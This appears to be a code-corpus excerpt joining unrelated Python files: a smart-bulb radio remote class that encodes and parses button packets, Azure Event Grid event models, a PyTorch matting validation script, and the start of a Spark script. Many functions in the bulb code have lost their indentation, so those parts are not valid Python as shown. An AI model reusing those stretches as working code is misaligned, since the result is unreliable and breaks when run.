retval = [0x85, 0xb2, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x00, 0x45, 0x01, 0xb3, 0x1d, 0x3f]
if button_info['button'] == 'temperature_up':
if message_id % 2 == 0:
retval = [0x85, 0xb4, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x00, 0x4b, 0x01, 0xbb, 0x9c, 0x4b]
else:
retval = [0x85, 0xb4, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x80, 0x4e, 0x81, 0x3e, 0x26, 0x00]
if button_info['button'] == 'temperature_down':
if message_id % 2 == 0:
retval = [0x05, 0xb5, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x80, 0x46, 0x01, 0x37, 0xd5, 0x69]
else:
retval = [0x05, 0xb5, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x80, 0x4a, 0x01, 0x3b, 0x1a, 0x06]
if button_info['button'] == 'max':
retval = [0x85, 0xb7, 0x80, 0x88, 0x91, 0xb1, 0x6f, 0x80, 0x66, 0x81, 0xd9, 0x07, 0x22]
if retval is None:
self._debug("Unsupported button: {}".format(button_info))
return None
# XXX: This probably breaks the CRC :-(
if 'zone' in button_info:
retval[6] = (retval[6] & 0xf0) | (0x07 + button_info['zone'])
else:
retval[6] = (retval[6] & 0xf0) | 0x0f
retval.append(0x00)
retval.append(0x0F)
return retval
def _parse_button_message_lyh_cct(self, button_message):
return {'raw': button_message}
return None
    def _pair_lyh_cct(self, zone):
        """Pairing for LYH-CCT remotes is not implemented yet (protocol not reversed)."""
        # XXX
        return None
    def _unpair_lyh_cct(self, zone):
        """Unpairing for LYH-CCT remotes is not implemented yet (protocol not reversed)."""
        # XXX
        return None
def _compute_button_message_cct(self, button_info):
remote_id = button_info['remote_id']
message_id = button_info['message_id']
# Header consists of magic (0x5A), follow by 16-bit remote ID
header = [0x5A, (remote_id >> 8) & 0xff, remote_id & 0xff]
# Determine zone, default to all
zone = button_info.get('zone', 0)
# Some buttons need to be converted to zones
button_name = button_info['button']
if button_name in ['zone_on', 'zone_off', 'zone_max', 'zone_night']:
button_name = "{}:{}".format(button_name, zone)
# Look up the button
button_id = self._config['button_map'][button_name]
# Compute message body
body = [zone, button_id, message_id]
# Compute the whole message so far
message = header + body
# Compute message trailer
## Include a CRC, for good measure
crc = len(message) + 1
for byte in message:
crc = crc + byte
crc = crc & 0xff
trailer = [crc]
message = message + trailer
return message
def _parse_button_message_cct(self, button_message):
button_info = {}
# Verify the header -- if it is not valid, return None
if button_message[0] != 0x5A:
return None
# Parse out common parts of the message
button_info['remote_id'] = (button_message[1] << 8) | button_message[2]
button_info['zone'] = button_message[3]
button_info['message_id'] = button_message[5]
# Remove the all zone
if button_info['zone'] == 0:
del button_info['zone']
# Map the button ID to a button name
button_id = button_message[4]
button_info.update(self._compute_button_and_zone_from_button_id(button_id))
return button_info
    def _pair_cct(self, zone):
        """Pair a CCT bulb to *zone* by pressing zone_on, then guard-sleep 5s."""
        self._send_button({
            'button': 'zone_on',
            'zone': zone
        })
        # Ensure that the "on" button cannot be hit soon after
        # because it might trigger the unpair flow
        time.sleep(5)
        return True
    def _unpair_cct(self, zone):
        """Unpair a CCT bulb from *zone*.

        Pressing zone_on repeatedly in quick succession triggers the bulb's
        unpair flow (see the guard sleep in _pair_cct).
        """
        for retry in range(7):
            self._send_button({
                'button': 'zone_on',
                'zone': zone
            })
        return True
    def _compute_button_message_rgbw(self, button_info):
        """Build the raw RGBW packet for *button_info*.

        Layout: [0xB0, id_hi, id_lo, color, brightness|zone, button, message_id].
        NOTE: mutates button_info in place; _send_button passes in a copy.
        """
        remote_id = button_info['remote_id']
        message_id = button_info['message_id']
        # Allow setting color for all zones
        if button_info['button'] == 'set_color':
            button_info['button'] = 'zone_set_color'
            if 'zone' in button_info:
                del button_info['zone']
        # Allow setting brightness for all zones
        if button_info['button'] == 'set_brightness':
            button_info['button'] = 'zone_set_brightness'
            if 'zone' in button_info:
                del button_info['zone']
        # Header consists of magic (0xB0), follow by 16-bit remote ID
        header = [0xB0, (remote_id >> 8) & 0xff, remote_id & 0xff]
        # Default value for most buttons, since they do not need it
        brightness = 0
        color = 0
        # Some buttons need to be converted to zones
        button_name = button_info['button']
        if button_name in ['zone_on', 'zone_off', 'zone_white', 'zone_night']:
            button_name = button_name + ':' + str(button_info['zone'])
        button_id = self._config['button_map'][button_name]
        # Brightness and Color buttons should also set the appropriate
        # parameters
        if button_info['button'] == 'zone_set_brightness':
            ## Brightness is a range of [0..25] (26 steps), clamped,
            ## mapped onto the wire encoding and shifted 3 bits left
            ## (the low 3 bits carry the zone; see below)
            brightness = button_info['brightness']
            if brightness < 0:
                brightness = 0
            elif brightness > 25:
                brightness = 25
            brightness = 31 - ((brightness + 15) % 32)
            brightness = brightness << 3
        elif button_info['button'] == 'zone_set_color':
            color = button_info['color']
        # The zone number is also encoded into the brightness byte
        if 'zone' not in button_info:
            zone_value = 0
        else:
            zone_value = button_info['zone']
        brightness |= zone_value & 0b111
        # Compute message
        body = [color, brightness, button_id, message_id]
        # Compute whole message
        message = header + body
        return message
    def _parse_button_message_rgbw(self, button_message):
        """Decode a raw RGBW packet back into a button_info dict, or None on bad magic.

        Inverse of _compute_button_message_rgbw, including the brightness/zone
        bit packing for zone_set_brightness.
        """
        button_info = {}
        # Verify the header -- if it is not valid, return None
        if button_message[0] != 0xB0:
            return None
        # Parse out common parts of the message
        button_info['remote_id'] = (button_message[1] << 8) | button_message[2]
        button_info['color'] = button_message[3]
        button_info['brightness'] = button_message[4]
        button_info['message_id'] = button_message[6]
        # Map the button ID to a button name
        button_id = button_message[5]
        button_info.update(self._compute_button_and_zone_from_button_id(button_id))
        if button_info['button'] == 'zone_set_brightness':
            brightness = button_info['brightness']
            # Low 3 bits carry the zone; zone 0 means "all zones"
            zone = brightness & 0b111
            if zone != 0:
                button_info['zone'] = zone
            else:
                button_info['button'] = 'set_brightness'
            # Compute brightness value, there are 26 brightness steps, [16, 0][31, 23]
            brightness = brightness >> 3
            brightness = 31 - ((brightness + 15) % 32)
            button_info['brightness'] = brightness
        return button_info
    def _pair_rgbw(self, zone):
        """Pair an RGBW bulb to *zone* by pressing zone_on during pairing mode."""
        self._send_button({
            'button': 'zone_on',
            'zone': zone
        })
        # NOTE(review): returns False, unlike _pair_cct which returns True — confirm intentional.
        return False
    def _unpair_rgbw(self, zone):
        """Unpair an RGBW bulb from *zone*: zone_on immediately followed by zone_white."""
        self._send_button({
            'button': 'zone_on',
            'zone': zone
        })
        self._send_button({
            'button': 'zone_white',
            'zone': zone
        })
        # NOTE(review): returns False, unlike _unpair_cct which returns True — confirm intentional.
        return False
def _get_next_message_id(self):
# Determine next message ID
self._message_id = (self._message_id + 1) & 0xff
return self._message_id
    def _send_button(self, button_info, post_delay = None):
        """Encode *button_info* and transmit it via the radio.

        Fills in remote_id and a fresh message_id unless the caller supplied
        them; per-call 'delay'/'retries' keys override the config defaults,
        and *post_delay* (seconds) overrides the delay again (used for
        transitions). Always returns True.
        """
        # Include the remote ID unless one was supplied
        button_info = button_info.copy()
        if 'remote_id' not in button_info:
            button_info['remote_id'] = self._id
        # Get the next message ID for this remote
        if 'message_id' not in button_info:
            message_id = self._get_next_message_id()
            button_info['message_id'] = message_id
        else:
            # Caller pinned the message id: keep the counter in sync with it
            self._message_id = button_info['message_id']
        # Compute message
        message = self._compute_button_message(button_info)
        # Transmit
        if 'delay' in button_info:
            delay = button_info['delay']
        else:
            delay = self._config['delay']
        if 'retries' in button_info:
            retries = button_info['retries']
        else:
            retries = self._config['retries']
        format_config = self._config.get('format_config', None)
        if post_delay is not None:
            delay = post_delay
        self._debug("Sending {}={} n={} times with a {}s delay to queue {}, format = {}".format(button_info, message, retries, delay, self._config['radio_queue'], format_config))
        self._radio.multi_transmit(message, self._config['channels'], retries, delay, syncword = self._config['syncword'], submit_queue = self._config['radio_queue'], format_config = format_config)
        return True
def _set_brightness(self, brightness, zone = None, transition = None):
if transition is not None:
self._debug('Tranisition not supported for SET-type bulbs (yet)')
if zone is None:
message = {'button': 'set_brightness'}
else:
message = {
'button': 'zone_set_brightness',
'zone': zone
}
message['brightness'] = brightness
return self._send_button(message)
    def _step_value(self, target_value, target_range_min, target_range_max, button_prefix, zone, midpoint = None, transition = None):
        """Drive a step-only control (brightness/temperature) to an absolute value.

        Strategy: slam the control to the nearest extreme by stepping the full
        range (or using the dedicated "max" button when the remote has one),
        then step from that known extreme to *target_value*. *midpoint* picks
        which extreme to start from; *transition* (seconds) spreads the final
        steps out over time via per-send post delays.
        """
        # Step all the way to the nearest extreme before moving it to
        # where it should be
        target_range = target_range_max - target_range_min + 1
        if midpoint is None:
            midpoint = (target_range / 2) + target_range_min
        # Move to the "initial" value where we force the value
        # to the extreme, then move it to its final value
        initial_steps = target_range
        if target_value < midpoint:
            initial_direction = 'down'
            final_direction = 'up'
            initial_value = target_range_min
        else:
            initial_direction = 'up'
            final_direction = 'down'
            initial_value = target_range_max
        # If this remote has a "max" feature, use that instead of stepping
        use_max_button = False
        if initial_value == target_range_max:
            if 'has_max_{}'.format(button_prefix) in self._config['features']:
                use_max_button = True
        if use_max_button:
            self._debug("[INITIAL] Going to max {}".format(button_prefix))
            # e.g. _max_brightness(zone)
            getattr(self, "_max_{}".format(button_prefix))(zone)
        else:
            # Otherwise, step it
            step_command = {'button': "{}_{}".format(button_prefix, initial_direction)}
            if zone is not None:
                step_command['zone'] = zone
            for step in range(initial_steps):
                self._debug("[INITIAL] Stepping {} {}".format(button_prefix, initial_direction))
                self._send_button(step_command)
        # Now that we have forced the value to the extreme, move in
        # steps from that value to the desired value
        if initial_value < target_value:
            final_steps = target_value - initial_value
        else:
            final_steps = initial_value - target_value
        step_command = {'button': "{}_{}".format(button_prefix, final_direction)}
        if zone is not None:
            step_command['zone'] = zone
        transition_delay = None
        if transition is not None and final_steps > 1:
            # Spread the remaining steps evenly over the transition window
            transition_delay = transition / (final_steps - 1)
        for step in range(final_steps):
            if step == (final_steps - 1):
                # No delay after the last step
                transition_delay = None
            self._debug("[FINAL] Stepping {} {} with a delay of {} (ms) afterwards".format(button_prefix, final_direction, transition_delay))
            self._send_button(step_command, post_delay = transition_delay)
        return True
    def _step_brightness(self, brightness, brightness_min, brightness_max, zone = None, transition = None):
        """Set brightness on step-only remotes via _step_value."""
        # For setting the brightness, set a change-overpoint at around
        # 75%, where below this value we will go to the dimmest and
        # step up and above this point it will go to the brightest
        # and step down. This is to avoid getting bright then dimming
        # which is much more jarring than getting dim and brightening.
        if transition is None:
            brightness_changeover = ((brightness_max - brightness_min) * 0.75) + brightness_min
        else:
            # With a transition, force the changeover above the range so we
            # always start from the dim end and brighten gradually.
            brightness_changeover = brightness_max * 2
        return self._step_value(brightness, brightness_min, brightness_max, 'brightness', zone, midpoint = brightness_changeover, transition = transition)
def _step_temperature(self, temperature, temperature_min, temperature_max, zone = None):
    # Thin wrapper: temperature has no changeover heuristic, so rely on the
    # default midpoint behaviour of _step_value.
    return self._step_value(temperature, temperature_min, temperature_max, 'temperature', zone)
def _max_brightness(self, zone = None):
    """Press the remote's max-brightness button, zone-specific when a zone
    is given, and return the result of sending that message."""
    message = {'button': 'max'} if zone is None else {'button': 'zone_max', 'zone': zone}
    return self._send_button(message)
def _rgb_to_hue(self, r, g, b):
r = r / 255.0
g = g / 255.0
b = b / 255.0
cmax = max(r, max(g, b))
cmin = min(r, min(g, b))
diff = cmax - cmin
if cmax == cmin:
h = 0
elif cmax == r:
h = (60 * ((g - b) / diff) + 360) % 360
elif cmax == g:
h = (60 * ((b - r) / diff) + 120) % 360
elif cmax == b:
h = (60 * ((r - g) / diff) + 240) % 360
return h
def _rgb_to_color(self, rgb):
    """Convert a 24-bit RGB value into a LimitlessLED colour value.

    :param rgb: colour packed as 0xRRGGBB
    :return: colour-wheel position 0-255, or a negative number when the
             input is a shade of grey, encoded as -(brightness + 1)
    """
    r = (rgb >> 16) & 0xff
    g = (rgb >> 8) & 0xff
    b = rgb & 0xff
    # If the value is really a shade of white
    # encode the brightness as a negative value
    # where 0 is -1, 1 is -2, etc
    if r == g and g == b:
        return (r * -1) - 1
    # Compute the hue of the RGB value (ignore
    # luminance and saturation)
    h = self._rgb_to_hue(r, g, b)
    # Convert the hue into a LimitlessLED value
    # which is really just the position along the
    # color strip, offset
    color = ((h / 360.0) * 255.0) + 26
    color = color % 256
    color = int(color + 0.5)
    # BUGFIX: _rgb_to_hue already returns degrees, so log the hue as-is;
    # the previous message multiplied by 360 a second time.
    self._debug("RGB = \x1b[38;2;%i;%i;%im%06x\x1b[0m; Hue = %s; Color = %i" % (r, g, b, rgb, str(h), color))
    return color
def raw_send_button(self, button_info):
    # Public escape hatch: forward an arbitrary button message dict
    # unmodified to the radio layer.
    return self._send_button(button_info)
def raw_read_button(self):
    """Listen on the remote's first channel and return one parsed button
    message (whatever _parse_button_message yields for the raw data)."""
    channel = self._config['channels'][0]
    self._radio.set_syncword(self._config['syncword'], submit_queue = None)
    self._radio.start_listening(channel)
    # Some protocols are not length encoded, specify the length instead
    length = self._config.get('message_length', None)
    format_config = self._config.get('format_config', None)
    data = self._radio.receive(channel = channel, wait = True, wait_time = 0.1, length = length, format_config = format_config)
    message = self._parse_button_message(data)
    return message
def set_brightness(self, brightness, zone = None, transition = None):
    """Set brightness on the public 0-255 scale, scaled to the remote's range.

    0 turns the bulbs off; 255 presses the max-brightness button when the
    remote has one and no transition was requested.  Returns False when the
    remote cannot control brightness or the value is out of range.
    """
    if 'has_brightness' not in self._config['features']:
        return False
    if brightness < 0 or brightness > 255:
        return False
    self._debug("Setting brightness to {} with transition {} s".format(brightness, transition))
    if brightness == 0:
        self._debug("Really setting to off")
        return self.off(zone)
    if brightness == 255 and transition is None:
        if 'has_max_brightness' in self._config['features']:
            return self._max_brightness(zone)
    brightness_min = self._config['brightness_range'][0]
    brightness_max = self._config['brightness_range'][1]
    # Map the public 1-255 scale onto the remote's native range.
    brightness = self._scale_int(brightness, 1, 255, self._config['brightness_range'][0], self._config['brightness_range'][1])
    if 'can_set_brightness' in self._config['features']:
        # Remote supports setting an absolute brightness directly.
        return self._set_brightness(brightness, zone, transition)
    else:
        # Otherwise emulate it by stepping from a known extreme.
        return self._step_brightness(brightness, brightness_min, brightness_max, zone, transition)
def set_color(self, rgb, zone = None):
    """Set the bulb colour from a 24-bit RGB value (0xRRGGBB).

    Greys (r == g == b) are handled by switching to white at the encoded
    brightness rather than picking a colour-wheel position.  Returns False
    when the remote has no colour support.
    """
    # Compute the color value from the RGB value
    value = self._rgb_to_color(rgb)
    # If the color selected is really a shade of grey, turn the
    # bulbs white at that brightness
    if value < 0:
        # Undo the -(brightness + 1) encoding from _rgb_to_color.
        brightness = (value + 1) * -1
        self._debug("Brightness = {}".format(brightness))
        if self.white(zone):
            return self.set_brightness(brightness, zone)
        else:
            return False
    # If the bulbs do not support color, nothing needs to be done
    if 'has_color' not in self._config['features']:
        return False
    # Press the correct color button
    if zone is None:
        message = {'button': 'set_color'}
    else:
        message = {'button': 'zone_set_color', 'zone': zone}
    message['color'] = value
    # Press the button
    return self._send_button(message)
def set_temperature(self, kelvins, zone = None):
    """Set the colour temperature, clamping to the remote's supported span
    and scaling kelvins onto the remote's output value range."""
    if 'has_temperature' not in self._config['features']:
        return False
    temperature_input_coldest = self._config['temperature_input_range'][0]  # e.g. 6500
    temperature_input_warmest = self._config['temperature_input_range'][1]  # e.g. 3000
    temperature_output_coldest = self._config['temperature_output_range'][0]  # e.g. 0
    temperature_output_warmest = self._config['temperature_output_range'][1]  # e.g. 9
    # If there is only one supported color temperature, we are already at that temperature
    # Make no adjustment to the temperature to account for small variances
    if temperature_input_coldest == temperature_input_warmest:
        return True
    # Clamp the color temperature to something this remote supports
    if kelvins < temperature_input_warmest:
        kelvins = temperature_input_warmest
    elif kelvins > temperature_input_coldest:
        kelvins = temperature_input_coldest
    temperature = self._scale_int(kelvins, temperature_input_coldest, temperature_input_warmest, temperature_output_coldest, temperature_output_warmest)
    self._debug("Scaled kelvins={} to a temperature value of {}".format(kelvins, temperature))
    if 'can_set_temperature' in self._config['features']:
        # Remote supports an absolute temperature command.
        return self._set_temperature(temperature, zone)
    else:
        # Otherwise emulate it by stepping from a known extreme.
        return self._step_temperature(temperature, temperature_output_coldest, temperature_output_warmest, zone)
def on(self, zone = None, try_hard = False):
    """Turn on all bulbs, or only the given zone.

    When try_hard is set, retries and delay are doubled: on/off messages
    are important enough to warrant extra delivery attempts.
    """
    message = {'button': 'on'} if zone is None else {'button': 'zone_on', 'zone': zone}
    if try_hard:
        message['retries'] = self._config['retries'] * 2
        message['delay'] = self._config['delay'] * 2
    return self._send_button(message)
def off(self, zone = None, dim = True, try_hard = False):
    """Turn off all bulbs, or only the given zone.

    By default the bulbs are dimmed first so that the next power-on does
    not start at full brightness.  When try_hard is set, retries and delay
    are doubled to make delivery of this important message more reliable.
    """
    if dim:
        self.set_brightness(1, zone)
    message = {'button': 'off'} if zone is None else {'button': 'zone_off', 'zone': zone}
    if try_hard:
        message['retries'] = self._config['retries'] * 2
        message['delay'] = self._config['delay'] * 2
    return self._send_button(message)
def night(self, zone = None):
    """Press the night-mode button (zone-specific when a zone is given);
    returns False when the remote has no night mode."""
    if 'has_night' not in self._config['features']:
        return False
    message = {'button': 'night'} if zone is None else {'button': 'zone_night', 'zone': zone}
    return self._send_button(message)
def white(self, zone = None):
    """Switch the bulbs to white.

    Returns True immediately for white-only bulbs, False when white is not
    supported, otherwise the result of pressing the white button.
    """
    if 'is_white' in self._config['features']:
        return True
    if 'has_white' not in self._config['features']:
        return False
    message = {'button': 'white'} if zone is None else {'button': 'zone_white', 'zone': zone}
    return self._send_button(message)
# Methods to query remote identity and state
def get_zone_ids(self):
    # Zones this remote can address; the common default is four zones.
    return self._config.get('zones', [1, 2, 3, 4])
def get_type(self):
    # Remote/protocol type identifier (stored on construction).
    return self._type
def get_id(self):
    # Unique remote identifier (stored on construction).
    return self._id
def get_message_id(self):
    # Current message id counter; presumably advanced as messages are
    # sent elsewhere in the class -- confirm against _send_button.
    return self._message_id
def get_brightness_range(self):
    # Brightness is always a fixed range
    # (the public scale; set_brightness maps it onto the remote's native range)
    return [0, 255]
def get_temperature_range(self):
    # If the remote has no control over the temperature this
    # query gets a null response
    return self._config.get('temperature_input_range', None)
| StarcoderdataPython |
9604434 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint:disable=protected-access
from typing import Optional
from msrest.serialization import UTC
import datetime as dt
import uuid
import json
from ._generated import models
from ._generated.models import StorageBlobCreatedEventData, \
EventGridEvent as InternalEventGridEvent, \
CloudEvent as InternalCloudEvent
from ._shared.mixins import DictMixin
from ._event_mappings import _event_mappings
class CloudEvent(InternalCloudEvent):   #pylint:disable=too-many-instance-attributes
    """Properties of an event published to an Event Grid topic using the CloudEvent 1.0 Schema.

    All required parameters must be populated in order to send to Azure.

    :param source: Required. Identifies the context in which an event happened. The combination of id and source must be
     unique for each distinct event. If publishing to a domain topic, source must be the domain name.
    :type source: str
    :param data: Event data specific to the event type.
    :type data: object
    :param type: Required. Type of event related to the originating occurrence.
    :type type: str
    :param time: The time (in UTC) the event was generated, in RFC3339 format.
    :type time: ~datetime.datetime
    :param dataschema: Identifies the schema that data adheres to.
    :type dataschema: str
    :param datacontenttype: Content type of data value.
    :type datacontenttype: str
    :param subject: This describes the subject of the event in the context of the event producer
     (identified by source).
    :type subject: str
    :param id: Optional. An identifier for the event. The combination of id and source must be
     unique for each distinct event.
    :type id: Optional[str]
    """

    _validation = {
        'source': {'required': True},
        'type': {'required': True},
    }

    _attribute_map = {
        'additional_properties': {'key': '', 'type': '{object}'},
        'id': {'key': 'id', 'type': 'str'},
        'source': {'key': 'source', 'type': 'str'},
        'data': {'key': 'data', 'type': 'object'},
        'data_base64': {'key': 'data_base64', 'type': 'bytearray'},
        'type': {'key': 'type', 'type': 'str'},
        'time': {'key': 'time', 'type': 'iso-8601'},
        'specversion': {'key': 'specversion', 'type': 'str'},
        'dataschema': {'key': 'dataschema', 'type': 'str'},
        'datacontenttype': {'key': 'datacontenttype', 'type': 'str'},
        'subject': {'key': 'subject', 'type': 'str'},
    }

    def __init__(self, source, type, **kwargs):
        # type: (str, str, Any) -> None
        # BUGFIX: id is documented and mapped as str, so stringify the UUID
        # instead of storing a uuid.UUID object.
        kwargs.setdefault('id', str(uuid.uuid4()))
        kwargs.setdefault("source", source)
        kwargs.setdefault("type", type)
        # NOTE(review): this stores an ISO string although the attribute map
        # declares iso-8601 (datetime) -- confirm msrest serializes both.
        kwargs.setdefault("time", dt.datetime.now(UTC()).isoformat())
        kwargs.setdefault("specversion", "1.0")
        super(CloudEvent, self).__init__(**kwargs)
class EventGridEvent(InternalEventGridEvent):
    """Properties of an event published to an Event Grid topic using the EventGrid Schema.

    Variables are only populated by the server, and will be ignored when sending a request.
    All required parameters must be populated in order to send to Azure.

    :param topic: The resource path of the event source. If not provided, Event Grid will stamp onto the event.
    :type topic: str
    :param subject: Required. A resource path relative to the topic path.
    :type subject: str
    :param data: Event data specific to the event type.
    :type data: object
    :param event_type: Required. The type of the event that occurred.
    :type event_type: str
    :ivar metadata_version: The schema version of the event metadata. If provided, must match Event Grid Schema exactly.
     If not provided, EventGrid will stamp onto event.
    :vartype metadata_version: str
    :param data_version: The schema version of the data object. If not provided, will be stamped with an empty value.
    :type data_version: str
    :param id: Optional. An identifier for the event. The combination of id and source must be
     unique for each distinct event.
    :type id: Optional[str]
    :param event_time: Optional.The time (in UTC) of the event. If not provided, it will be the time (in UTC) the event was generated.
    :type event_time: Optional[~datetime.datetime]
    """

    _validation = {
        'id': {'required': True},
        'subject': {'required': True},
        'data': {'required': True},
        'event_type': {'required': True},
        'event_time': {'required': True},
        'metadata_version': {'readonly': True},
        'data_version': {'required': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'topic': {'key': 'topic', 'type': 'str'},
        'subject': {'key': 'subject', 'type': 'str'},
        'data': {'key': 'data', 'type': 'object'},
        'event_type': {'key': 'eventType', 'type': 'str'},
        'event_time': {'key': 'eventTime', 'type': 'iso-8601'},
        'metadata_version': {'key': 'metadataVersion', 'type': 'str'},
        'data_version': {'key': 'dataVersion', 'type': 'str'},
    }

    def __init__(self, subject, event_type, **kwargs):
        # type: (str, str, Any) -> None
        # BUGFIX: id is documented and mapped as str, so stringify the UUID
        # instead of storing a uuid.UUID object.
        kwargs.setdefault('id', str(uuid.uuid4()))
        kwargs.setdefault('subject', subject)
        kwargs.setdefault("event_type", event_type)
        # NOTE(review): stores an ISO string although the attribute map
        # declares iso-8601 (datetime) -- confirm msrest serializes both.
        kwargs.setdefault('event_time', dt.datetime.now(UTC()).isoformat())
        kwargs.setdefault('data', None)
        super(EventGridEvent, self).__init__(**kwargs)
class DeserializedEvent():
    """The container for the deserialized event model and mapping of event envelope properties.

    :param dict event: the raw event envelope as a dict
    """

    def __init__(self, event):
        # type: (Any) -> None
        self._model = None          # lazily-built typed model, cached after first access
        self._event_dict = event

    def to_json(self):
        # type: () -> dict
        """Return the original event payload as a dict."""
        return self._event_dict

    @property
    def model(self):
        # type: () -> Union[CloudEvent, EventGridEvent]
        """
        Returns strongly typed EventGridEvent/CloudEvent object defined by the format of the properties.
        All properties of the model are strongly typed (ie. for an EventGridEvent, event_time property will return a datetime.datetime object).

        model.data: Returns a system event type(StorageBlobCreated, StorageBlobDeleted, etc.). If model.type/model.event_type is not defined in the
        system registry, returns None.

        :raise: :class:`ValueError`, when events do not follow CloudEvent or EventGridEvent schema.
        :rtype: Union[CloudEvent, EventGridEvent]
        """
        if not self._model:
            try:
                # The presence of 'specversion' distinguishes CloudEvent 1.0
                # envelopes from EventGrid-schema envelopes.
                if 'specversion' in self._event_dict.keys():
                    self._model = CloudEvent.deserialize(self._event_dict)
                    event_type = self._model.type
                else:
                    self._model = EventGridEvent.deserialize(self._event_dict)
                    event_type = self._model.event_type
            except Exception as err:
                # BUGFIX: was a bare `except:` which also swallowed
                # KeyboardInterrupt/SystemExit and dropped the cause; chain it.
                raise ValueError("Event is not correctly formatted CloudEvent or EventGridEvent.") from err
            self._deserialize_data(event_type)
        return self._model

    def _deserialize_data(self, event_type):
        """
        Sets self._model.data to strongly typed event object if event type exists in _event_mappings.
        Otherwise, sets self._model.data to None.

        :param str event_type: The event_type of the EventGridEvent object or the type of the CloudEvent object.
        """
        # if system event type defined, set model.data to system event object
        try:
            self._model.data = (_event_mappings[event_type]).deserialize(self._model.data)
        except KeyError:    # else, if custom event, then model.data is dict and should be set to None
            self._model.data = None
class CustomEvent(DictMixin):
    """The wrapper class for a CustomEvent, to be used when publishing events.

    Behaves like a dict via DictMixin: every key/value passed to the
    constructor is stored as an item on the event itself.

    :param dict args: dict
    """

    def __init__(self, *args, **kwargs):
        # type: (Any, Any) -> None
        self._update(*args, **kwargs)

    def _update(self, *args, **kwargs):
        # Copy every key/value pair onto this mapping; item assignment is
        # provided by DictMixin.
        for k, v in dict(*args, **kwargs).items():
            self[k] = v
| StarcoderdataPython |
9641112 | <filename>validate.py
"""
Validation
Implemented by <NAME>
"""
import argparse
import os
import torch
from torch.utils.data import DataLoader
from torchvision import utils as v_utils
from tqdm import tqdm
from data_path import DATA_PATH
from dataset.augmentation import ValidFrameSampler, ValidAugmentation
from dataset.video_matte import VideoMatte240KDataset
from model import MattingBase
from model.utils import load_matched_state_dict
# --------------- Arguments ---------------

parser = argparse.ArgumentParser()
parser.add_argument('--dataset-name', type=str, default='videomatte8k', choices=DATA_PATH.keys())
parser.add_argument('--model-backbone', type=str, default='resnet50', choices=['resnet50'])
parser.add_argument('--model-checkpoint', type=str, default=r'<path to checkpoint>')
parser.add_argument('--output-path', type=str, default=r'<path to output>')
parser.add_argument('--seq-length', type=int, default=1)   # frames per sampled sequence
parser.add_argument('--num-workers', type=int, default=0)  # DataLoader worker processes
args = parser.parse_args()
# --------------- Loading ---------------

# Validation dataset: a fixed background image (id 142) composited under
# each foreground/alpha sequence, resized to 224x224.
dataset_valid = VideoMatte240KDataset(
    video_matte_path=DATA_PATH[args.dataset_name]['valid'],
    background_image_path=DATA_PATH['backgrounds']['valid'],
    seq_length=args.seq_length,
    seq_sampler=ValidFrameSampler(),
    transform=ValidAugmentation((224, 224)),
    background_image_id=142
)
# NOTE(review): dataloader_valid is constructed but the loop below iterates
# dataset_valid directly -- confirm whether the DataLoader is still needed.
dataloader_valid = DataLoader(
    dataset_valid,
    pin_memory=False,
    batch_size=1,
    num_workers=args.num_workers
)

# Model
model = MattingBase(args.model_backbone).cuda()
load_matched_state_dict(model, torch.load(args.model_checkpoint))
model.eval()  # inference mode: no dropout, frozen batch-norm statistics
# Validate
def save_img_tensor_list(t, start_index, output_dir):
    """Save each image in the first batch of tensor *t* as a numbered PNG.

    :param t: batched image tensor; only t[0] is iterated and saved
    :param start_index: number used for the first output file name
    :param output_dir: subdirectory (under args.output_path) to write into
    """
    output_path = os.path.join(args.output_path, output_dir)
    os.makedirs(output_path, exist_ok=True)
    # enumerate(..., start=...) replaces the manual index counter.
    for index, img in enumerate(t[0], start=start_index):
        v_utils.save_image(img, os.path.join(output_path, f'{index:06d}.png'))
os.makedirs(args.output_path, exist_ok=True)

with torch.no_grad():
    for seq_index, (fgr, pha, bgr) in enumerate(tqdm(dataset_valid)):
        true_fgr = fgr.unsqueeze(0).cuda(non_blocking=True)
        true_bgr = bgr.unsqueeze(0).cuda(non_blocking=True)
        true_pha = pha.unsqueeze(0).cuda(non_blocking=True)

        # Composite the ground-truth source: foreground over background,
        # weighted by the alpha matte.
        true_src = true_bgr.clone()
        true_src = true_fgr * true_pha + true_src * (1 - true_pha)

        pred_pha, pred_fgr, pred_err = model(true_src)[:3]
        state = model.decoder.state3
        index_start = seq_index * args.seq_length

        # BUGFIX: the inner loop used to reuse the outer loop variable `i`,
        # shadowing the sequence index; use a distinct channel index.
        for channel in range(state[0][0].size()[1]):
            save_img_tensor_list(state[0][0][:, channel, :, :].unsqueeze(0), index_start, f'state_h_{channel}')
            save_img_tensor_list(state[0][1][:, channel, :, :].unsqueeze(0), index_start, f'state_c_{channel}')
        save_img_tensor_list(pred_pha, index_start, 'pred_pha')
        save_img_tensor_list(true_pha, index_start, 'true_pha')
        save_img_tensor_list(pred_err, index_start, 'pred_err')
        save_img_tensor_list(true_src, index_start, 'true_src')
| StarcoderdataPython |
90860 | # Copyright 2017 <NAME>.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Number of Spark partitions to spread the filings over.
PARTITIONS = 200

import sys

from lxml import etree
from schema import *
from lookup import SingletonLookup, MultiLookup
from cred import Credentials
from pyspark import SparkContext

